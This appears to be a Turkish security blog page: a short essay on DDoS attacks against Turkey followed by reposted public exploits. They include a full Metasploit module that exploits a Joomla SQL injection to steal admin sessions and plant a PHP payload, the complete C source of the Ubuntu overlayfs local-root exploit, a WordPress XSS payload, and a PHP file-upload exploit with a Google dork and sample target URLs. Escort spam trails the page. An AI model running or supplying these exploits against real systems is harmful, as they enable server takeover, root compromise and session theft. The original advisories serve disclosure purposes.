DDOS SALDIRILARI

DDOS SALDIRILARI ÜZERİNE

Son bir aydır ülkemiz üzerine yapılan DDOS saldırılarına karşı güvenlik önlemlerimizin oldukça yetersiz olduğunu görmüş olduk. Geçici önlem olarak kolaycı yöntem tercih edilmiş, yurt dışı iplerine erişim kapatılmış, ” .tr” uzantısı prestij kaybına uğramıştır. Banka sistemlerine yapılan DDOS saldırıları nedeniyle internet bankacılığında sıkıntılar yaşanmıştır.kilit-security

WEB TABANLI DDOS SALDIRILARI

Hazır scriptlerin kullanım alanları oldukça yaygındır. Başta wordpress, joomla, drupal, PHPBB, vbulletin olmak üzere bir çok hazır script çok yaygın olarak kullanılmaktadır. Bu zamana kadar, bu tür scriptlerin ve eklentilerinin oldukça fazla güvenlik açıkları security sitelerinde yayınlanmış, bu açıklardan istifade edilerek sunuculara shell, ddos yazılımları, virüs, root exploitleri, rotkit vs upload edilerek, kötü niyetli kişiler tarafından amaçlarına uygun olarak kullanılmıştır, kullanılmaktadır.

Yukarıda bahsi geçen yaygın açıklar bulunduğu veya yayınlandığı anda bu güvenik açıkları taranmakta, bu açıklardan istifade edilerek, binlerce sunucunun herhangi bir dizinine ddos exploitleri veya uzaktan çağrı kodları yerleştirilmektedir.

Gerektiği taktirde, bu sunuculara bağlanılarak gerekli komutlar verilerek hedef siteye DDOS saldırıları yapılabilmektedir. web tabanlı sunuculardan yapılan saldırılar sunucu sayısıyla orantılı olarak daha etkili olabilmektedir. web sunucuları 7/24 açık olup, hat kapasitesi kişisel bilgisayarlardan çok daha yüksektir. 2011 yılında Ermeni tasarısı nedeniyle, daha başka saldırılarda da bu teknik iskorpitx kullanılmış olup, hedef siteler kısa zamanda down olmuş, daha sonra güvenlik önlemleri arttırılmış, hat kapasitelerini olağanüstü arttırmak zorunda kalmışlardır.

Sunucuya yerleştirilen zararlı yazılımlar sunucu yetkilileri veya antivirüsler tarafından farkedilip kaldırılabilir, saldırı alan hosting yetkilileri saldırıların hangi ip numarasından geldiğini farkedip, karşı sunucuya abuse bildiriminde bulunarak kaldırılmasını sağlayabilir.

Web tabanlı DDOS saldırısı, daha önceden 10 binlerce kişisel pc ye bulaştırılarak yapılan BOTNET tarzı DDOS saldırılarından mantık olarak çok farklı değildir. Binlerce web sunucusundan yapılan saldırı hat kapasitesi yönünden oldukça üstündür.

TR’de bu tür DDOS saldırıları çok fazla bilinmezken, 2004, 2005,2006 yıllarında deneme yanılma yöntemleriyle iskorpitx tarafından TR’deki hack içerikli sitelerle, illegal sitelerine yapılmış ve oldukça etkili sonuçlar alınmıştır.

Son yıllarda yazılımsal, donanımsal veya https://www.cloudflare.com/ddos/ servisleri kullanılarak DDOS saldırılarına karşı etkili önlemler alınmıştır.

DDOS saldırısının etkili olması için karşı sunucunun hat kapasitesinin üzerinde olması gerekir.

En son Nic.tr ye yapılan 40 Gbitlik saldırı boyut olarak çok yüksek boyutlu bir saldırı değildir. Dışarıdan yapılan bu tür saldırılara karşı, karşı saldırı birimleri kurulması gerekliliktir. Bazen en iyi savunma saldırıdır. Karşı savunma birimlerinin varlığı kesinlikle caydırıcı etki yaratacaktır.

Siyami Özkan

Joomla Content History SQLi Remote Code Execution

Joomla Content History Uzaktan SQL komut çalıştırma metasploit exploit joomla 3.2 3.4 açıklar bulunmaktadır

joomla

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution",
   'Description'  => %q{
    This module exploits a SQL injection vulnerability found in Joomla versions
    3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
    component in the core of Joomla. Triggering the SQL injection makes it possible
    to retrieve active Super User sessions. The cookie can be used to login to the
    Joomla administrator backend. By creating a new template file containing our
    payload, remote code execution is made possible.
   },
   'License'    => MSF_LICENSE,
   'Author'     =>
    [
     'Asaf Orpani', # Vulnerability discovery
     'xistence <xistence[at]0x90.nl>' # Metasploit module
    ],
   'References'   =>
    [
     [ 'CVE', '2015-7857' ], # Admin session hijacking
     [ 'CVE', '2015-7297' ], # SQLi
     [ 'CVE', '2015-7857' ], # SQLi
     [ 'CVE', '2015-7858' ], # SQLi
     [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
     [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
    ],
   'Payload'    =>
    {
     'DisableNops' => true,
     # Arbitrary big number. The payload gets sent as POST data, so
     # really it's unlimited
     'Space'    => 262144, # 256k
    },
   'Platform'    => ['php'],
   'Arch'      => ARCH_PHP,
   'Targets'    =>
    [
     [ 'Joomla 3.x <= 3.4.4', {} ] ], 'Privileged' => false,
   'DisclosureDate' => "Oct 23 2015",
   'DefaultTarget' => 0))
 
   register_options(
    [
     OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
    ], self.class)
 
 end
 
 def check
 
  # Request using a non-existing table
  res = sqli(rand_text_alphanumeric(rand(10)+6))
 
  if res && res.body =~ /`(.*)_ucm_history`/
   return Exploit::CheckCode::Vulnerable
  end
  return Exploit::CheckCode::Safe
 
 end
 
 
 def sqli( tableprefix )
 
  # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
  # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
  # This way we make sure that's excluded and we only get real admin sessions.
 
  sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
 
  # Retrieve cookies
  res = send_request_cgi({
   'method'  => 'GET',
   'uri'   => normalize_uri(target_uri.path, "index.php"),
   'vars_get' => {
    'option' => 'com_contenthistory',
    'view' => 'history',
    'list[ordering]' => '',
    'item_id' => '1',
    'type_id' => '1',
    'list[select]' => sql
    }
   })
 
  return res
 
 end
 
 
 def exploit
 
  # Request using a non-existing table first, to retrieve the table prefix
  res = sqli(rand_text_alphanumeric(rand(10)+6))
 
  if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
   table_prefix = $1
   print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
  else
   fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
  end
 
  # Retrieve the admin session using our retrieved table prefix
  res = sqli("#{table_prefix}_")
 
  if res && res.code == 500 && res.body =~ /Duplicate entry &#039;([a-z0-9]+)&#039; for key/
   auth_cookie_part = $1[0...-1]
   print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
  else
   fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
  end
 
  # Retrieve cookies
  res = send_request_cgi({
   'method'  => 'GET',
   'uri'   => normalize_uri(target_uri.path, "administrator", "index.php")
  })
 
  if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
   cookie_begin = $1
   print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
  else
   fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
  end
 
  # Modify cookie to authenticated admin
  auth_cookie = cookie_begin
  auth_cookie << "="
  auth_cookie << auth_cookie_part
  auth_cookie << ";" # Authenticated session res = send_request_cgi({ 'method' => 'GET',
   'uri'   => normalize_uri(target_uri.path, "administrator", "index.php"),
   'cookie' => auth_cookie
   })
 
  if res && res.code == 200 && res.body =~ /Administration - Control Panel/
   print_status("#{peer} - Successfully authenticated as Administrator")
  else
   fail_with(Failure::Unknown, "#{peer} - Session failure")
  end
 
 
  # Retrieve template view
  res = send_request_cgi({
   'method'  => 'GET',
   'uri'   => normalize_uri(target_uri.path, "administrator", "index.php"),
   'cookie' => auth_cookie,
   'vars_get' => {
    'option' => 'com_templates',
    'view' => 'templates'
    }
   })
 
  # We try to retrieve and store the first template found
  if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
   template_id = $1
   file_id = $2
  else
   fail_with(Failure::Unknown, "Unable to retrieve template")
  end
 
  filename = rand_text_alphanumeric(rand(10)+6)
 
  # Create file
  print_status("#{peer} - Creating file [ #{filename}.php ]")
  res = send_request_cgi({
   'method'  => 'POST',
   'uri'   => normalize_uri(target_uri.path, "administrator", "index.php"),
   'cookie' => auth_cookie,
   'vars_get' => {
    'option' => 'com_templates',
    'task' => 'template.createFile',
    'id' => template_id,
    'file' => file_id,
    },
   'vars_post' => {
    'type' => 'php',
    'name' => filename
   }
   })
 
  # Grab token
  if res && res.code == 303 && res.headers['Location']
   location = res.headers['Location']
   print_status("#{peer} - Following redirect to [ #{location} ]")
   res = send_request_cgi(
    'uri'  => location,
    'method' => 'GET',
    'cookie' => auth_cookie
   )
 
   # Retrieving template token
   if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
    token = $1
    print_status("#{peer} - Token [ #{token} ] retrieved")
   else
    fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
   end
 
   if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
    template_path = $1
    print_status("#{peer} - Template path [ #{template_path} ] retrieved")
   else
    fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
   end
 
  else
   fail_with(Failure::Unknown, "#{peer} - Creating file failed")
  end
 
  filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
 
  # Inject payload data into file
  print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
  res = send_request_cgi({
   'method'  => 'POST',
   'uri'   => normalize_uri(target_uri.path, "administrator", "index.php"),
   'cookie' => auth_cookie,
   'vars_get' => {
    'option' => 'com_templates',
    'view' => 'template',
    'id' => template_id,
    'file' => filename_base64,
    },
   'vars_post' => {
    'jform' => payload.encoded,
    'task' => 'template.apply',
    token => '1',
    'jform[extension_id]' => template_id,
    'jform[filename]' => "/#{filename}.php"
   }
   })
 
  if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
   print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
  else
   fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
  end
 
  # Request payload
  register_files_for_cleanup("#{filename}.php")
  print_status("#{peer} - Executing payload")
  res = send_request_cgi({
   'method'  => 'POST',
   'uri'   => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
   'cookie' => auth_cookie
  })
 
 end
 
end

Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell)

Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell) açığına ilişkin kodlar yer alıyor.

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328   (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
 
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
 
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
 
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
 
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n  return _real_getuid();\n}\n"
 
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
  char *file;
  system("rm -rf /tmp/ns_sploit");
  mkdir("/tmp/ns_sploit", 0777);
  mkdir("/tmp/ns_sploit/work", 0777);
  mkdir("/tmp/ns_sploit/upper",0777);
  mkdir("/tmp/ns_sploit/o",0777);
 
  fprintf(stderr,"mount #1\n");
  if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
      fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
      exit(-1);
    }
    file = ".access";
    chmod("/tmp/ns_sploit/work/work",0777);
  } else file = "ns_last_pid";
 
  chdir("/tmp/ns_sploit/o");
  rename(file,"ld.so.preload");
 
  chdir("/");
  umount("/tmp/ns_sploit/o");
  fprintf(stderr,"mount #2\n");
  if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
      exit(-1);
    }
    chmod("/tmp/ns_sploit/work/work",0777);
  }
 
  chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
  umount("/tmp/ns_sploit/o");
}
 
int
main(int argc, char **argv)
{
  int status, fd, lib;
  pid_t wrapper, init;
  int clone_flags = CLONE_NEWNS | SIGCHLD;
 
  fprintf(stderr,"spawning threads\n");
 
  if((wrapper = fork()) == 0) {
    if(unshare(CLONE_NEWUSER) != 0)
      fprintf(stderr, "failed to create new user namespace\n");
 
    if((init = fork()) == 0) {
      pid_t pid =
        clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
      if(pid < 0) {
        fprintf(stderr, "failed to create new mount namespace\n");
        exit(-1);
      }
 
      waitpid(pid, &status, 0);
 
    }
 
    waitpid(init, &status, 0);
    return 0;
  }
 
  usleep(300000);
 
  wait(NULL);
 
  fprintf(stderr,"child threads done\n");
 
  fd = open("/etc/ld.so.preload",O_WRONLY);
 
  if(fd == -1) {
    fprintf(stderr,"exploit failed\n");
    exit(-1);
  }
 
  fprintf(stderr,"/etc/ld.so.preload created\n");
  fprintf(stderr,"creating shared library\n");
  lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
  write(lib,LIB,strlen(LIB));
  close(lib);
  lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
  if(lib != 0) {
    fprintf(stderr,"couldn't create dynamic library\n");
    exit(-1);
  }
  write(fd,"/tmp/ofs-lib.so\n",16);
  close(fd);
  system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
  execl("/bin/su","su",NULL);
}

WordPress Quick Contact Form Plugin 6.0 – Persistent XSS

wordpress-vulnerability

WordPress Quick Contact Form Plugin 6.0 – Persistent XSS açığı bulunmuş olup açığın oluşum yerliri ve kullanımı hakkında açıklamalar aşağıdaki gibidir.

===============================================================================
|                                       |
             ____           _ __
       ___ __ __/ / /__ ___ ______ ______(_) /___ __
       / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
      /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
                           /___/ team

             PUBLIC SECURITY ADVISORY
|                                       |
===============================================================================

TITLE
=====

Quick Contact Form - Persistent Cross Site Scripting Vulnerability

AUTHOR
======

Zy0d0x

DATE
====

10/06/2013

VENDOR
======

Quick Plugins - http://quick-plugins.com/

AFFECTED PRODUCT
================

Quick Contact Form WordPress Plugin Version 6.0 possibly earlier

VULNERABILITY CLASS
===================

Cross-Site Scripting

DESCRIPTION
===========

Quick Contact Form suffers from a persistent Cross-Site Scripting vulnerability due to a lack
of input validation and output sanitization of the qcfname4 paramater.
Other input fields are also effective to reflective cross site scripting.

PROOF OF CONCEPT
================

Enter the following into the field where Quick Contact Form requests a Message.

--- SNIP ---

"><script>alert(String.fromCharCode(90,121,48,100,48,120))</script><

--- SNIP ---

If the message has been sent successfully a alert diolog will apear containing Zy0d0x when an user checks there message in the dashboard.

IMPACT
======

An attacker could potentially hijack session authentication tokes of remote users and leverage the
vulnerability to increase the attack vector to the underlying software and operating system of the victim.

THREAT LEVEL
============

High

STATUS
======

Fixed update to version 6.1

DISCLAIMER
==========

nullsecurity.net hereby emphasize, that the information which is published here are
for education purposes only. nullsecurity.net does not take any responsibility for
any abuse or misusage!

WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

wordpress-vulnerabilityWordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload açığı bulunmuş olup, açık sayesinde Shell upload edilerek servere ulaşım sağlanmakta ve zararlı kodların çalışmasına neden olunabilmektedir. Açık bulucunun açık hakkındaki değerlendirmeleri ve php exploit aşağıdaki şekilde.

 

Title:
======
Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability
Date:
=====
2013-09-17
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1080
VL-ID:
=====
1080
Common Vulnerability Scoring System:
====================================
6.6
Introduction:
=============
Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website.
The plugin enables a wealth of functionality, but just because you can take advantage of its many features,
doesn’t mean you necessarily should. For each feature you implement you should consider the benefit for
your users. Don’t make the interface more complex than necessary. Less is more!

We have made it very easy for you to customize basically anything you can imagine. The Isotype Gallery has
188 different settings you can tweak and the Touch Slider has 146 different settings.

(Copy of the Vendor Homepage: http://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606 )
Abstract:
=========
An independent Vulnerability Laboratory Researcher discovered a arbitrary file upload vulnerability in the WordPress Complete Gallery Manager v3.3.3 plugin.
Report-Timeline:
================
2013-09-17:  Public Disclosure (Fuad Pilus)
Status:
========
Published
Affected Products:
==================
CodeCanyon
Product: Complete Gallery Manager 3.3.3
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A arbitrary file upload web vulnerability is detected in the CodeCanyon WordPress Plugin Complete Gallery Manager v3.3.3 Web-Application.
The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.

The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the upload-images.php
file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the
other one to execute for example php codes.

Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
				[+] CodeCanyon - Complete Gallery Manager

Vulnerable Module(s):
				[+] Image File Upload

Vulnerable File(s):
				[+] upload-images.php

Affected Module(s):
				[+] Application Index Listing (http://localhost:8000/)

Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...

Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Exploit :

<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/

Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).

Credits:
========
Independent Vulnerability Researcher - Fuad Pilus (codernime@gmail.com)
Greetz to : Code Newbie Team - Malaysia & Indonesia BlackHat
Byakuya | Cai | Lord Router | Ops Msia Bersatu | Clound | Agam | Encik Linux | X-Tuned and all official Code-Newbie Member

Disclaimer:
===========
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com  	- www.vuln-lab.com			    - www.evolution-sec.com
Contact:  admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	    - admin@evolution-sec.com
Section:  www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		    - magazine.vulnerability-db.com
Social:	  twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	    - youtube.com/user/vulnerability0lab
Feeds:	  vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php  - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

escort bayanistanbul escortescort bayan